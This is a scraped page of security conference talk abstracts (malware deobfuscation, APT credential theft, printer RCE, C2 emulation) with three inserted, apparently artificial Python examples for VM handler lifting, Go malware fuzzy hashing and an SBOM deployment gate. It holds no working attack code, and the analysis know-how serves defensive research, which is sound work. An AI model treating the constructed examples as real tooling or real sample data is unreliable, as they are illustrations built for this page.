Btrfs as a technology has been getting a lot of attention over the past few years. While interesting for its feature set alone (checksums, copy-on-write, snapshots and built-in device management), without proper management tooling and integration with other parts of the operating system it is difficult for the average user to use Btrfs to its full potential.
This session will help you understand the features of Btrfs and how Snapper can be used for snapshot management in SUSE Linux Enterprise. We will also provide use cases and an outlook on future functionality.
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo... - CODE BLUE
It started with computer hacking and Japanese linguistics as a kid. Zach Mathis has been based in Kobe, Japan, and has performed both red team services and blue team incident response and defense consultation for major global Japanese corporations since 2006. He is the founder of Yamato Security, one of the largest and most popular hands-on security communities in Japan, and has been providing free training since 2012 to help improve the local security community. Since 2016, he has been teaching security for the SANS Institute and holds numerous GIAC certifications. Currently, he is working with other Yamato Security members to provide free and open-source security tools to help security analysts with their work.
[cb22] Tales of 5G hacking by Karsten Nohl - CODE BLUE
Most 5G networks are built in fundamentally new ways, opening new hacking avenues.
Mobile networks have so far been monolithic systems from big vendors; now they become open vendor-mixed ecosystems. Networks are rapidly adopting cloud technologies including dockerization and orchestration. Cloud hacking techniques become highly relevant to mobile networks.
The talk dives into the hacking potential of the technologies needed for these open networks. We illustrate the security challenges with vulnerabilities we found in real-world networks.
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A... - CODE BLUE
Printers have become one of the essential devices in the corporate intranet over the past few years, and their functionality has also increased significantly. Not only printing or faxing: cloud printing services like AirPrint are also supported to make them easier to use. Direct printing from mobile devices is now a basic requirement in the IoT era. We also use them to print internal business documents of the company, which makes it even more important to keep the printer safe.
Nowadays, most printers on the market do not have to be connected by USB or a traditional cable. As long as a LAN cable connects them to the intranet, a computer can find and use the printer immediately. Most of this is based on protocols such as SLP and LLMNR. But is it really safe when vendors adopt those protocols? Furthermore, many printers do not use traditional Linux systems but an RTOS (Real-Time Operating System) instead; how does this affect the attacker?
In this talk, we will use the Canon ImageCLASS MF644Cdw and HP Color LaserJet Pro MFP M283fdw as case studies, showing how to analyze and gain control of the printer. We will also demonstrate how to use the vulnerabilities to achieve unauthenticated RCE on the RTOS.
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
While hackers have known the importance of sharing research to improve security for years, the importance of coordinated vulnerability disclosure is increasingly recognized by governments around the world. The principles of disclosure and protecting security researchers are common across borders, but different countries have some key differences. This panel will present a global perspective that may in turn inform key public policy and company behavior.
ENISA published 'Coordinated Vulnerability Disclosure policies in the EU' in April 2022. This report not only provides an objective introduction to the current state of coordinated vulnerability disclosure policies in the Member States of the European Union, but also introduces the operation of vulnerability disclosure in China, Japan and the USA. Based on these findings, the desirable and good practice elements of a coordinated vulnerability disclosure process are examined, followed by a discussion of the challenges and issues.
This session aims to share the contents of this report and clarify the challenges and future direction of operations in Japan, as well as national security and vulnerability handling issues in the US, in a panel discussion with representatives from various jurisdictions.
The panelists are involved in the practice of early warning partnership notified bodies in Japan, the authors of the above report in Europe and the contributors to the above report in the US.
In Japan, the issues of system awareness, incentives, increase in the number of outstanding cases in handling and so-called triage in handling vulnerabilities will be introduced.
From the United States, the Vulnerabilities Equities Process for National Security and the publication of a non-prosecution policy for vulnerability research will be introduced, as well as a historical background on the issue.
The aim is that the panel discussion will enable the audience to understand the international situation surrounding CVD, as well as future trends, in particular the important role of vulnerability handling in cybersecurity and the challenges society faces around it.
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...CODE BLUE
Yuuma Taki is a 4th-year student in the Faculty of Information Media at Hokkaido Information University.
At university he is focusing on security for lower-level components such as the OS and CPU. In his third year of undergraduate school, he worked on implementing the OS security mechanism KASLR at SecHack365.
Currently, he is learning about ROP derivative technology and embedded equipment security.
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...CODE BLUE
In October 2021, we published the first analysis of Wslink – a unique loader likely linked to the Lazarus group. Most samples are packed and protected with an advanced virtual machine (VM) obfuscator; the samples contain no clear artifacts and we initially did not associate the obfuscation with a publicly known VM, but we later managed to connect it to CodeVirtualizer. This VM introduces several additional obfuscation techniques such as insertion of junk code, encoding of virtual operands, duplication of virtual opcodes, opaque predicates, merging of virtual instructions, and a nested VM.
Our presentation analyzes the internals of the VM and describes our semi-automated approach to “see through” the obfuscation techniques in reasonable time. We demonstrate the approach on some bytecode from a protected sample and compare the results with a non-obfuscated sample, found subsequent to starting our analysis, confirming the method’s validity. Our solution is based on a known deobfuscation method that extracts the semantics of the virtual opcodes, using symbolic execution with simplifying rules. We further treat the bytecode chunks and some internal constructs of the VM as concrete values instead of as symbolic ones, enabling the known deobfuscation method to deal with the additional obfuscation techniques automatically.
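As an added example (not ESET's tooling and not the Wslink VM itself), the Python below lifts one constructed, obfuscated VM handler the way the abstract describes: the bytecode chunk is treated as concrete, so operand decoding and an opaque predicate fold to constants, while the virtual registers stay symbolic and a few simplifying rules strip the junk arithmetic. The micro-op format, the handler for opcode 0x07 and the bytecode bytes are invented for this illustration.

```python
"""Added example: lifting one obfuscated VM handler by symbolic execution.

Expressions are ints (concrete), strings (symbolic virtual registers such
as "v1") or tuples (op, lhs, rhs). The bytecode chunk is kept concrete, so
operand decoding and the opaque predicate fold to constants and only the
handler's real semantics survive simplification."""

MASK = 0xFFFFFFFF


def simplify(op, a, b):
    """Constant folding plus the algebraic identities the junk code relies on."""
    if isinstance(a, int) and isinstance(b, int):
        return {"add": (a + b) & MASK, "sub": (a - b) & MASK, "xor": a ^ b}[op]
    if op == "xor":
        if b == 0:
            return a
        if a == 0:
            return b
        if a == b:                      # x ^ x
            return 0
    if op == "add":
        if b == 0:
            return a
        if a == 0:
            return b
        if (isinstance(b, int) and isinstance(a, tuple)
                and a[0] == "add" and isinstance(a[2], int)):
            return simplify("add", a[1], (a[2] + b) & MASK)   # (x + c1) + c2
    if op == "sub":
        if b == 0:
            return a
        if a == b:                      # x - x
            return 0
    return (op, a, b)


# Constructed bytecode for one virtual instruction: opcode, key, then three
# operand bytes XOR-encoded with the key (dst=v0, src1=v1, src2=v2).
KEY = 0x5A
BYTECODE = bytes([0x07, KEY, 0 ^ KEY, 1 ^ KEY, 2 ^ KEY])

# Constructed handler for opcode 0x07, as micro-ops over native registers
# r0..r4. ("bc", i) reads byte i of the bytecode chunk.
HANDLER_07 = [
    ("imm", "r3", ("bc", 1)),                          # r3 = key
    ("imm", "r0", ("bc", 2)), ("xor", "r0", "r3"),     # r0 = dst index
    ("imm", "r1", ("bc", 3)), ("xor", "r1", "r3"),     # r1 = src1 index
    ("imm", "r2", ("bc", 4)), ("xor", "r2", "r3"),     # r2 = src2 index
    ("vload", "r1", "r1"),                             # r1 = VREG[r1] (symbolic)
    ("vload", "r2", "r2"),                             # r2 = VREG[r2]
    ("imm", "r4", 0xDEAD), ("xor", "r4", "r4"),        # junk: r4 = 0
    ("add", "r1", "r4"),                               # junk: r1 += 0
    ("add", "r1", "r2"),                               # the real operation
    ("skip_if_zero", "r4", 1),                         # opaque predicate, always taken
    ("xor", "r1", "r3"),                               # dead path, never executed
    ("vstore", "r0", "r1"),                            # VREG[r0] = r1
]


def lift_handler(handler, bytecode):
    """Symbolically execute `handler` over a concrete bytecode chunk.
    Returns {vreg_index: expression} for every virtual-register store."""
    regs, stores, pc = {}, {}, 0
    while pc < len(handler):
        ins = handler[pc]
        op, dst = ins[0], ins[1]
        pc += 1
        if op == "imm":                   # immediate or bytecode byte, both concrete
            src = ins[2]
            regs[dst] = bytecode[src[1]] if isinstance(src, tuple) else src
        elif op in ("add", "sub", "xor"):
            regs[dst] = simplify(op, regs[dst], regs[ins[2]])
        elif op == "vload":               # index must have folded to a constant
            idx = regs[ins[2]]
            if not isinstance(idx, int):
                raise ValueError("symbolic virtual-register index")
            regs[dst] = stores.get(idx, f"v{idx}")
        elif op == "vstore":
            idx = regs[dst]
            if not isinstance(idx, int):
                raise ValueError("symbolic virtual-register index")
            stores[idx] = regs[ins[2]]
        elif op == "skip_if_zero":        # branch on a (hopefully) concrete value
            cond = regs[dst]
            if not isinstance(cond, int):
                raise ValueError("symbolic branch condition; needs path exploration")
            if cond == 0:
                pc += ins[2]
        else:
            raise ValueError(f"unknown micro-op {op}")
    return stores


def show(e):
    """Render an expression tree as infix text."""
    if isinstance(e, tuple):
        sym = {"add": "+", "sub": "-", "xor": "^"}[e[0]]
        return f"({show(e[1])} {sym} {show(e[2])})"
    return hex(e) if isinstance(e, int) else e


def lift_vadd():
    """Lift the constructed handler; expected result: v0 = (v1 + v2)."""
    return {i: show(x) for i, x in lift_handler(HANDLER_07, BYTECODE).items()}


if __name__ == "__main__":
    for i, text in lift_vadd().items():
        print(f"v{i} = {text}")
```

Running it prints `v0 = (v1 + v2)`, i.e. opcode 0x07 is a virtual add; the decoded operand indices, the `0xDEAD ^ 0xDEAD` junk and the opaque branch never reach the output. If a register index or branch condition stays symbolic the lifter raises, which is exactly the point at which a real deobfuscator has to concretize more VM state or explore paths.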
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...CODE BLUE
Kimsuky is a North Korean APT possibly controlled by North Korea's Reconnaissance General Bureau. Based on reports from the Korea Internet & Security Agency (KISA) and other vendors, TeamT5 identified that Kimsuky's most active group, CloudDragon, built a workflow functioning as a "Credential Factory" that collects and exploits credentials at scale.
The credential factory powers CloudDragon to start its espionage campaigns. CloudDragon's campaigns have aligned with DPRK's interests, targeting the organizations and key figures playing a role in the DPRK relationship. Our database suggested that CloudDragon has possibly infiltrated targets in South Korea, Japan, and the United States. Victims include think tanks, NGOs, media agencies, educational institutes, and many individuals.
CloudDragon's "Credential Factory" can be divided into three small cycles: the "Daily Cycle," the "Campaign Cycle," and the "Post-exploit Cycle." The "Daily Cycle" collects credentials in bulk and uses the stolen credentials to accelerate its APT life cycle.
In the "Campaign Cycle," CloudDragon develops new malware. While responding to CloudDragon incidents, we found that the actor still relied on BabyShark malware. CloudDragon once used BabyShark to deploy a new browser extension malware targeting victims' browsers. Moreover, CloudDragon is also developing a shellcode-based malware, Dust.
In the "Post-exploit Cycle," the actor relied on hacking tools rather than malicious backdoors. We also identified that the actor used remote desktop software to prevent detection.
In this presentation, we will go through some of the most significant operations conducted by CloudDragon, and more importantly, we will provide possible scenarios of future invasions for defense and detection.
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...CODE BLUE
Social media is no doubt a critical battlefield for threat actors to launch InfoOps, especially in a critical moment such as wartime or the election season. We have seen Bot-Driven Information Operations (InfoOps, aka influence campaigns) attempt to spread disinformation, incite protests in the physical world, and doxx journalists.
China's Bots-Driven InfoOps, despite operating on a massive scale, are often considered to have low impact and very little organic engagement. In this talk, we will share our observations on these persistent Bots-Driven InfoOps and dissect their harmful disinformation campaigns circulated in cyberspace.
In the past, most bots-driven operations simply parroted narratives of the Chinese propaganda machine, mechanically disseminating the same propaganda and disinformation artifacts made by Chinese state media. However, recently, we saw newly created bots turn to posting artifacts in a livelier manner. They utilized various tactics, including reposting screenshots of forum posts and disguising themselves as members of the “Milk Tea Alliance,” to create a false appearance that such content is being echoed across cyberspace.
We particularly focus on an ongoing Chinese bots-driven InfoOps campaign targeting Taiwan, which we dub "Operation ChinaRoot." Starting in mid-2021, the bots have been disseminating manipulated information about Taiwan's local politics and Covid-19 measures. Our further investigation has also identified the linkage between Operation ChinaRoot and other Chinese state-linked networks such as DRAGONBRIDGE and Spamouflage.
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...CODE BLUE
Malware written in Go is increasing every year. Go's cross-platform nature makes it an opportune language for attackers who wish to target multiple platforms. On the other hand, its statically linked libraries make it difficult to distinguish user functions from library code, which hinders analysis. This situation has increased the demand for Go malware classification and exploration.
In this talk, we will demonstrate the feasibility of computing similarity and classification of Go malware using a newly proposed method called gimpfuzzy. We have implemented "gimpfuzzy", which incorporates Fuzzy Hashing into the existing gimphash method. In this talk, we will verify the discrimination rate of the classification using the proposed method and confirm the validity of the proposed method by discussing some examples from the classified results. We will also discuss issues in Go-malware classification.
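The following Python is an added example, not the gimphash or gimpfuzzy implementation, showing the motivation behind a fuzzy variant: an exact hash over a Go binary's package list changes completely when one package is added, while a fuzzy digest still scores the two samples as close. The package lists are constructed stand-ins for what an analyst extracts from a Go binary's pclntab, the exact hash only sketches the gimphash idea (hash of the sorted, de-duplicated package paths), and the fuzzy digest is a deliberately small context-triggered piecewise hash written for this example.

```python
"""Added example: exact hash versus fuzzy digest over a Go package list.

Everything here is constructed for illustration; it is neither the gimphash
nor the gimpfuzzy algorithm, only a small model of why fuzzy hashing helps."""
import difflib
import hashlib

B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
FNV_OFFSET, FNV_PRIME = 0x811C9DC5, 0x01000193


def canonical_packages(pkgs):
    """Sorted, de-duplicated package paths, newline separated."""
    return "\n".join(sorted(set(pkgs))).encode()


def exact_hash(pkgs):
    """gimphash-style sketch: one added package gives an unrelated digest."""
    return hashlib.sha256(canonical_packages(pkgs)).hexdigest()


def fuzzy_digest(data, block_size=4):
    """Context-triggered piecewise hash: a rolling value over the last three
    bytes decides where a block ends, and each block contributes one
    character derived from its FNV-1a hash. An edit therefore disturbs only
    the blocks around it; the rest of the digest is unchanged."""
    out, h = [], FNV_OFFSET
    for i, byte in enumerate(data):
        h = ((h ^ byte) * FNV_PRIME) & 0xFFFFFFFF
        window = data[max(0, i - 2): i + 1]
        rolling = sum((k + 1) * b for k, b in enumerate(window))
        if rolling % block_size == block_size - 1:   # content-defined boundary
            out.append(B64[h & 63])
            h = FNV_OFFSET
    if h != FNV_OFFSET:                              # trailing partial block
        out.append(B64[h & 63])
    return "".join(out)


def similarity(pkgs_a, pkgs_b):
    """Score in [0, 1] between the fuzzy digests of two package lists."""
    da = fuzzy_digest(canonical_packages(pkgs_a))
    db = fuzzy_digest(canonical_packages(pkgs_b))
    return difflib.SequenceMatcher(None, da, db).ratio()


# Constructed package lists; not taken from any real sample.
SAMPLE_A = [
    "main",
    "github.com/example/loader/cmd",
    "github.com/example/loader/crypt",
    "github.com/example/loader/net",
    "golang.org/x/sys/windows",
    "golang.org/x/sys/windows/registry",
]
SAMPLE_B = SAMPLE_A + ["github.com/example/loader/persist"]   # one added package
SAMPLE_C = [
    "main",
    "github.com/other/agent/beacon",
    "github.com/other/agent/shell",
    "golang.org/x/crypto/chacha20",
]


def compare_samples():
    """Exact hash breaks on the one-package change; fuzzy score survives it."""
    return {
        "exact_a_eq_b": exact_hash(SAMPLE_A) == exact_hash(SAMPLE_B),
        "fuzzy_a_b": round(similarity(SAMPLE_A, SAMPLE_B), 2),
        "fuzzy_a_c": round(similarity(SAMPLE_A, SAMPLE_C), 2),
    }


if __name__ == "__main__":
    print(compare_samples())
```

The sorted list keeps the digest stable against link order, and the content-defined block boundaries resynchronise a few bytes after the inserted package, so `SAMPLE_A` and `SAMPLE_B` share most of their digest characters while the unrelated `SAMPLE_C` shares only the common `github.com/` and `golang.org/x/` prefixes. A production fuzzy hash (ssdeep, TLSH) does the same job with a better-studied block scheme and comparison function.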
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...CODE BLUE
Malware analysts normally obtain IP addresses of the malware's command & control (C2) servers by analyzing samples. This approach works in commoditized attacks or campaigns. However, with targeted attacks using APT malware, it's difficult to acquire a sufficient number of samples for organizations other than antivirus companies. As a result, malware C2 IOCs collected by a single organization are just the tip of the iceberg.
For years, I have reversed the C2 protocols of high-profile APT malware families then discovered the active C2 servers on the Internet by emulating the protocols. In this presentation, I will explain how to emulate the protocols of two long-term pieces of malware used by PRC-linked cyber espionage threat actors: Winnti 4.0 and ShadowPad.
Both pieces of malware support multiple C2 protocols such as TCP/TLS/HTTP/HTTPS/UDP. It's also common to have different data formats and encoding algorithms per protocol in one piece of malware. I'll cover the protocol details while referring to unique functions such as server-mode in Winnti 4.0 and multiple protocols listening on a single port in ShadowPad. Additionally, I'll share the findings regarding the Internet-wide C2 scanning and its limitations.
After the presentation, I'll publish over 140 C2 IOCs with the date ranges in which they were discovered. These dates are more helpful than just IP address information since the C2s are typically found on hosted servers, meaning that the C2 could sometimes exist on a specific IP only for a very limited time. 65% of these IOCs have 0 detection on VirusTotal as of the time of this writing.
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...CODE BLUE
We are swamped with new types of malware every day. The goal of malware analysis is not to reveal every single detail of the malware; it is more important to develop tools for efficiency or introduce automation to avoid repeating the same analysis process. Therefore, malware analysts usually actively develop tools and build analysis systems. On the other hand, such tool development and system maintenance cost a lot. Incident trends change daily and malware keeps evolving, so it is not easy to keep up with new threats. Malware analysts spend a long time maintaining their analysis systems, which reduces the time available for the necessary analysis of new types of malware.
To solve these problems, we incorporate DevOps practices into malware analysis to reduce the cost of system maintenance by using CI/CD and Serverless. This presentation shares our experience on how CI/CD, Serverless, and other cloud technologies can be used to streamline malware analysis. Specifically, the following case studies are discussed.
* Malware C2 Monitoring
* Malware Hunting using Cloud
* YARA CI/CD system
* Malware Analysis System on Cloud
* Memory Forensics on Cloud
Through the above case studies, we will share the benefits and tips of using the cloud and show how to build a similar system using Infrastructure as Code (IaC). The audience will learn how to improve the efficiency of malware analysis and build a malware analysis system using Cloud infrastructure.
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfPaige Cruz
Monitoring and observability aren’t traditionally found in software curriculums and many of us cobble this knowledge together from whatever vendor or ecosystem we were first introduced to and whatever is a part of your current company’s observability stack.
While the dev and ops silo continues to crumble….many organizations still relegate monitoring & observability as the purview of ops, infra and SRE teams. This is a mistake - achieving a highly observable system requires collaboration up and down the stack.
I, a former op, would like to extend an invitation to all application developers to join the observability party and will share these foundational concepts to build on:
A tale of scale & speed: How the US Navy is enabling software delivery from l...sonjaschweigert1
Rapid and secure feature delivery is a goal across every application team and every branch of the DoD. The Navy’s DevSecOps platform, Party Barge, has achieved:
- Reduction in onboarding time from 5 weeks to 1 day
- Improved developer experience and productivity through actionable findings and reduction of false positives
- Maintenance of superior security standards and inherent policy enforcement with Authorization to Operate (ATO)
Development teams can ship efficiently and ensure applications are cyber ready for Navy Authorizing Officials (AOs). In this webinar, Sigma Defense and Anchore will give attendees a look behind the scenes and demo secure pipeline automation and security artifacts that speed up application ATO and time to production.
We will cover:
- How to remove silos in DevSecOps
- How to build efficient development pipeline roles and component templates
- How to deliver security artifacts that matter for ATO’s (SBOMs, vulnerability reports, and policy evidence)
- How to streamline operations with automated policy checks on container images
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
In the rapidly evolving landscape of technologies, XML continues to play a vital role in structuring, storing, and transporting data across diverse systems. The recent advancements in artificial intelligence (AI) present new methodologies for enhancing XML development workflows, introducing efficiency, automation, and intelligent capabilities. This presentation will outline the scope and perspective of utilizing AI in XML development. The potential benefits and the possible pitfalls will be highlighted, providing a balanced view of the subject.
We will explore the capabilities of AI in understanding XML markup languages and autonomously creating structured XML content. Additionally, we will examine the capacity of AI to enrich plain text with appropriate XML markup. Practical examples and methodological guidelines will be provided to elucidate how AI can be effectively prompted to interpret and generate accurate XML markup.
Further emphasis will be placed on the role of AI in developing XSLT, or schemas such as XSD and Schematron. We will address the techniques and strategies adopted to create prompts for generating code, explaining code, or refactoring the code, and the results achieved.
The discussion will extend to how AI can be used to transform XML content. In particular, the focus will be on the use of AI XPath extension functions in XSLT, Schematron, Schematron Quick Fixes, or for XML content refactoring.
The presentation aims to deliver a comprehensive overview of AI usage in XML development, providing attendees with the necessary knowledge to make informed decisions. Whether you’re at the early stages of adopting AI or considering integrating it in advanced XML development, this presentation will cover all levels of expertise.
By highlighting the potential advantages and challenges of integrating AI with XML development tools and languages, the presentation seeks to inspire thoughtful conversation around the future of XML development. We’ll not only delve into the technical aspects of AI-powered XML development but also discuss practical implications and possible future directions.
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...Neo4j
Leonard Jayamohan, Partner & Generative AI Lead, Deloitte
This keynote will reveal how Deloitte leverages Neo4j’s graph power for groundbreaking digital twin solutions, achieving a staggering 100x performance boost. Discover the essential role knowledge graphs play in successful generative AI implementations. Plus, get an exclusive look at an innovative Neo4j + Generative AI solution Deloitte is developing in-house.
Threats to mobile devices are more prevalent and increasing in scope and complexity. Users of mobile devices desire to take full advantage of the features available on those devices, but many of those features provide convenience and capability at the expense of security. This best practices guide outlines steps users can take to better protect personal devices and information.
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024Neo4j
Neha Bajwa, Vice President of Product Marketing, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Albert Hoitingh
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview. Including the concepts of Customer Key and Double Key Encryption.
Pushing the limits of ePRTC: 100ns holdover for 100 daysAdtran
At WSTS 2024, Alon Stern explored the topic of parametric holdover and explained how recent research findings can be implemented in real-world PNT networks to achieve 100 nanoseconds of accuracy for up to 100 days.
UiPath Test Automation using UiPath Test Suite series, part 6DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 6. In this session, we will cover Test Automation with generative AI and Open AI.
UiPath Test Automation with generative AI and Open AI webinar offers an in-depth exploration of leveraging cutting-edge technologies for test automation within the UiPath platform. Attendees will delve into the integration of generative AI, a test automation solution, with Open AI advanced natural language processing capabilities.
Throughout the session, participants will discover how this synergy empowers testers to automate repetitive tasks, enhance testing accuracy, and expedite the software testing life cycle. Topics covered include the seamless integration process, practical use cases, and the benefits of harnessing AI-driven automation for UiPath testing initiatives. By attending this webinar, testers, and automation professionals can gain valuable insights into harnessing the power of AI to optimize their test automation workflows within the UiPath ecosystem, ultimately driving efficiency and quality in software development processes.
What will you get from this session?
1. Insights into integrating generative AI.
2. Understanding how this integration enhances test automation within the UiPath platform
3. Practical demonstrations
4. Exploration of real-world use cases illustrating the benefits of AI-driven test automation for UiPath
Topics covered:
What is generative AI
Test Automation with generative AI and Open AI.
UiPath integration with generative AI
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Maruthi Prithivirajan, Head of ASEAN & IN Solution Architecture, Neo4j
Get an inside look at the latest Neo4j innovations that enable relationship-driven intelligence at scale. Learn more about the newest cloud integrations and product enhancements that make Neo4j an essential choice for developers building apps with interconnected data and generative AI.
In his public lecture, Christian Timmerer provides insights into the fascinating history of video streaming, starting from its humble beginnings before YouTube to the groundbreaking technologies that now dominate platforms like Netflix and ORF ON. Timmerer also presents provocative contributions of his own that have significantly influenced the industry. He concludes by looking at future challenges and invites the audience to join in a discussion.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
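Two of the abstracts above, the Navy DevSecOps webinar (policy checks on container images, SBOMs and vulnerability reports as ATO evidence) and this talk (a deployment bill of materials), describe the same gate from different ends. As an added example, and not Party Barge, Anchore or OpsMx code, the Python below evaluates a policy over an SBOM plus scanner findings and records the result as a DBOM entry. The SBOM loosely follows the CycloneDX JSON shape; the components, the findings (with EXAMPLE-* identifiers) and the policy are all constructed for the illustration.

```python
"""Added example: SBOM-driven policy gate that records a deployment entry.

Constructed inputs throughout; the SBOM only approximates CycloneDX and the
finding ids are placeholders, not real advisories."""
import hashlib
import json
from datetime import datetime, timezone

SEVERITY_RANK = {"none": 0, "low": 1, "medium": 2, "high": 3, "critical": 4}

POLICY = {
    "max_severity": "medium",          # findings rated above this block the deploy
    "denied_licenses": ["AGPL-3.0-only"],
    "require_purl": True,              # a component without a purl cannot be tracked
    "exceptions": [],                  # finding ids with an accepted, documented risk
}

IMAGE_DIGEST = "sha256:" + hashlib.sha256(b"constructed-image").hexdigest()

SBOM = {
    "bomFormat": "CycloneDX", "specVersion": "1.5",
    "metadata": {"component": {"type": "container", "name": "example/api",
                               "version": IMAGE_DIGEST}},
    "components": [
        {"type": "library", "name": "libexample-ssl", "version": "1.2.3",
         "purl": "pkg:deb/debian/libexample-ssl@1.2.3",
         "licenses": [{"license": {"id": "Apache-2.0"}}]},
        {"type": "library", "name": "example-json", "version": "0.9.0",
         "purl": "pkg:pypi/example-json@0.9.0",
         "licenses": [{"license": {"id": "MIT"}}]},
        {"type": "library", "name": "legacy-tool", "version": "2.0",
         "licenses": [{"license": {"id": "AGPL-3.0-only"}}]},   # no purl at all
    ],
}

# Scanner output as summarised for the gate (constructed).
FINDINGS = [
    {"id": "EXAMPLE-0001", "severity": "critical",
     "affects": ["pkg:deb/debian/libexample-ssl@1.2.3"]},
    {"id": "EXAMPLE-0002", "severity": "medium",
     "affects": ["pkg:pypi/example-json@0.9.0"]},
    {"id": "EXAMPLE-0003", "severity": "high",
     "affects": ["pkg:npm/not-in-this-image@1.0.0"]},   # not shipped: ignored
]


def evaluate(sbom, findings, policy):
    """Return the list of policy violations; an empty list means deployable."""
    violations = []
    limit = SEVERITY_RANK[policy["max_severity"]]
    components = sbom.get("components", [])
    for comp in components:
        label = f"{comp['name']}@{comp.get('version', '?')}"
        if policy["require_purl"] and not comp.get("purl"):
            violations.append(f"{label}: no purl, cannot be matched to advisories")
        for entry in comp.get("licenses", []):
            lic = entry.get("license", {}).get("id")
            if lic in policy["denied_licenses"]:
                violations.append(f"{label}: license {lic} is denied")
    present = {comp.get("purl") for comp in components}
    for finding in findings:
        if finding["id"] in policy["exceptions"]:
            continue
        if SEVERITY_RANK[finding["severity"]] <= limit:
            continue
        # Only findings that touch a component actually in the image count;
        # this is the false-positive reduction the abstracts mention.
        hits = [p for p in finding["affects"] if p in present]
        if hits:
            violations.append(f"{finding['id']} ({finding['severity']}) affects {', '.join(hits)}")
    return violations


def canonical_sha256(obj):
    """Hash of a canonical JSON encoding, so evidence can be re-verified later."""
    blob = json.dumps(obj, sort_keys=True, separators=(",", ":")).encode()
    return hashlib.sha256(blob).hexdigest()


def deployment_record(sbom, findings, policy):
    """DBOM entry: what was deployed, against which policy, with which verdict."""
    violations = evaluate(sbom, findings, policy)
    return {
        "image": sbom["metadata"]["component"]["name"],
        "image_digest": sbom["metadata"]["component"]["version"],
        "sbom_sha256": canonical_sha256(sbom),
        "policy_sha256": canonical_sha256(policy),
        "findings_considered": len(findings),
        "violations": violations,
        "verdict": "allow" if not violations else "block",
        "evaluated_at": datetime.now(timezone.utc).isoformat(),
    }


if __name__ == "__main__":
    print(json.dumps(deployment_record(SBOM, FINDINGS, POLICY), indent=2))
```

With the constructed inputs the verdict is `block` for three reasons: the critical finding on `libexample-ssl`, the denied licence on `legacy-tool`, and `legacy-tool` having no purl. The high-severity finding on a package the image does not ship is not counted. Hashing the SBOM and the policy into the record is what lets an Authorizing Official later check that the evidence they were shown matches what was actually evaluated.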
[CB16] EXOTIC DATA RECOVERY & PARADAIS by Dai Shimogaito
1. @ CODEBLUE 2016 on Thu 20 Oct 2016
DAI SHIMOGAITO
OSAKA DATA RECOVERY ( daillo,inc. )
2. Who is Dai Shimogaito ?
Dai Shimogaito is a Japanese:
Data Recovery Engineer – Retrieving data from computer crash
